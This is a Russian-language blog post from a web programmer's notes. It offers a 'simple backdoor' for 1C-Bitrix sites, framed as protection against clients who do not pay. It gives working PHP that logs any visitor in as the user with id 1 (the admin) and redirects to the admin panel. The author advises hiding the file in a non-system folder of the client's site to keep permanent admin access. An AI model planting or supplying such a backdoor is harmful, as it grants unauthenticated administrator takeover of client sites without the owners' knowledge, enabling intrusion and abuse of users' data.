Простой бэкдор(back door) на 1c-bitrix.

← Назад в записки веб-программиста

Простой бэкдор(back door) на 1c-bitrix.

php1c-bitrixзащита

Рассмотрим простой бэкдор для битрикса в качестве не бэкдора, как его принято воспринимать, а как, наоборот, способ защититься от кидалова клиента, ну и простой и легкий способ быстро авторизоваться на сайте под любым пользователем.

Очень часто слышу жалобы и негодования дизайнеров на клиентов, мол кинули на денежку, забрали макет и не отдали денюжку, списав это на то, что макет не понравился и все такое в этом роде. В нашем же случае все намного проще. Программист в таких случаях считается хозяином ситуации, потому что у него всегда есть свои меры безопасности.

Давайте рассмотрим простой бэкдор на битриксе:


	//бэкдор битрикс
	<?
		require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/header.php"); //подключаем хидер
		global $USER; //объявляем переменную $USER
		$USER->Authorize(1); //авторизовываем пользователя под id = 1(в нашем случае админ)
		LocalRedirect("/bitrix/admin/"); //отправляем в админскую панель
	?>
				

Идея такая, закидываем файл с данным содержанием в какую-нибудь несистемную папку сайта. Скрипт запускает авторизацию указанного пользователя и кидает нас в админку сайта. Такой подход дает кучу различных преимуществ, пока файл на сервере в нужном месте, у вас всегда есть возможность зайти под админом и быть в курсе всех событий на сайте, имея все права и полномочия админа =)